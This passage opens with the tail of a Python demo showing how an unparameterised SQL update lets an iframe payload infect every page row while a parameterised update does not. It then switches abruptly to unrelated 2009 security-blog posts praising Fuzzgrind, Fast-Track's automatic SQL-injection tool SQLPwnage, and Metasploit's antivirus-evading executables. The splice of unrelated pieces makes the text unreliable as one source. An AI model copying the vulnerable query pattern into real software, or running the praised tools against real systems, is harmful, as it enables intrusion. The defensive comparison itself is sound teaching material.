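    rows = conn.execute("SELECT id, body FROM pages ORDER BY id").fetchall()
    return [pid for pid, body in rows if body.endswith(IFRAME)]


def body_of(conn, page_id):
    return conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(update_body_vulnerable(db, 3, PAYLOAD))
    print("infected after vulnerable update:", infected_page_ids(db))   # [1, 2, 3]
    db = make_db()
    update_body_safe(db, 3, PAYLOAD)
    print("infected after safe update:      ", infected_page_ids(db))   # []
```

The safe version stores the payload verbatim in page 3 and touches nothing else; any output encoding of that stored text is a separate (XSS) concern that parameterisation does not address.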
Friday, July 31, 2009
New security site ... http://triviasecurity.net
My friends and I will launch this Trivia Security site next week...I hope you all can participate in this forum ....
http://triviasecurity.net
About Trivia Security:
Trivia Security was born in early 2003 with one goal: to make it easier for the whole world to have everything under one site instead of spending hours searching. It was started by FreakXL; DerekDan joined the development of Trivia Security on Lycos servers, and as development neared completion in May 2003 Trivia was moved by DerekDan to a new server and the domain `triviasecurity.com`, now `triviasecurity.net`. aMado joined the Trivia Team and contributed a lot in the finishing stages. Without aMado, Trivia Security wouldn't be where it is right now.
Monday, July 27, 2009
Fuzzgrind
Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities.
It is based on the concept of symbolic execution. Thus, the tool starts from a file considered valid by the software under test, and analyses the execution path to extract any constraints tied to branch instructions followed by this software. By resolving constraints one by one, Fuzzgrind will alter the valid file to explore possible new branches of the software under test, in order to discover new vulnerabilities.
Fuzzgrind is licensed under the terms of the GNU GPL. Anybody is welcome to contribute!
Tuesday, March 24, 2009
FastTrack- Easier Penetration Testing Tool
Every IT professional, security engineer, security analyst and penetration tester is always looking for easier ways to perform penetration tests. I found this Fast-Track tool.
What is Fast-Track?
"Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when I was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of my advanced attacks and propagate it down to my team at SecureState, I ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride. "
I tried one of the powerful tools in Fast-Track, SQLPwnage.
"This tool scans subnets looking for web servers. After found, it automatically starts to crawl the site looking for post parameters. Once a list of post parameters have been identified, Fast-Track will either try blind SQL injection or error based SQL injection and attempt to automatically exploit the system for you. If successful, whatever payload you specified will be delivered to you, this could be meterpreter, reverse shell, bind shell, reverse vnc, and much more. SQLPwnage will automatically re-enable xp cmdshell if disabled, try to elevate permissions, and use the hex to binary bypass explained in the SQL bruter section to deliver our payloads."
You can see how to use SQLPwnage in this video.
Metasploit 3.2
The Metasploit Framework is a development platform for creating security tools and exploits. It's used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.
Compared to Metasploit 3.0, getting attack code onto a target machine is easier in Metasploit 3.2, with improvements to the raw packet tools. A new library called PacketFu is expected by Moore to provide packet injection for both wired and wireless endpoints. It also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.
Metasploit can also take exploit code and package it into an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template used to build those executables has been improved in Metasploit 3.2 in order to defeat antivirus vendors' signature detection.
If you have never tried Metasploit, you can download it here.